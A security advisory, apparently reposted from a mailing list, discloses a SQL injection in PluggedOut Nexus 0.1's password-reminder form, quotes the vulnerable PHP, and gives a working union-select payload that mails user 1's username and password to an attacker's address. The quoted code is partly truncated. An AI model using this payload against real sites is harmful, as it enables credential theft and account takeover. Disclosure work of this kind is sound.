PluggedOut Nexus SQL injection

PluggedOut Nexus SQL injection
Nexus is an open source script you can run on your web
server to give you a community based website
where people can register, search each others
interests, and communicate with one another either
through a private messaging system, or via chat
requests and forums.
Project : PluggedOut Nexus
Version : 0.1
Author : Jonathan Beckett
Home :

The information has been provided by Hamid Ebadi .
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:

Vulnerable Systems:PluggedOut Nexus 0.1


in this address If you fill the private email address
that you used while creating your account into the
form , the server will send you an email to that
address with your login details
Input passed to the "email" parameter in
"forgotten_password.php" isn't properly sanitised
before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.

in E-Mail Address form enter ' and press Send Request
you will redirect to
http://localhost/Nexus/site_problem.php and see :

Problem with Nexus website
A problem has occurred with the Nexus website - this
was not your fault, and the administrators probably
already know about it.

Vulnerable Code: The following lines in
"forgotten_password.php" :
if ($_POST["submit"]!=""){
$con = db_connect();
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM
nexus_users WHERE
$result = mysql_query($sql,$con);
if ($result!=false){
if (mysql_num_rows($result)>0){
$row = mysql_fetch_array($result);
$from = $site_admin_email;
$to = $row["cEMailPrivate"];
$subject = "Reminder Username/Password from
$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
."Your account details are as follows;\n"
." Username : ".$row["cUsername"]."\n"
." Password : ".$row["cPassword"]."\n\n"
."If you did not request this reminder message,
please contact the ".$site_long_name." administrator




insert this code in E-Mail Address form
(http://localhost/Nexus/forgotten_password.php) :
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@xxxxxxxxxxxxx' from
nexus_users WHERE nUserId=1 and '1'='1

and ATTACKER@xxxxxxxxxxxxx recieve email contain
username & password for userID=1 .


Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around

Relevant Pages

  • Re: Some Clarifications
    ... If you restrict yourself on e.g. ODBC or DBExpress you will not get even ... if one is restricting oneself to same one set of data access ... Abstract, you can access NexusDB through native nxdb components, SQL Server ... My advice to Bradley would be that if he just wants one db, nexus is a very ...
  • Re: Accuracer Database
    ... > I am looking at Nexus, and have not ruled it out. ... which embedded database to use? ... NexusDB, Firebird and DBISAM, or the Think SQL if you think that looks good) ... and evaluate the two or three best contenders in some detail - run your own ...
  • Re: Database component
    ... Currently not SQL based. ... You can write your own plug-ins which can ... accomplish the same thing. ... Nexus is a terrific DB; ...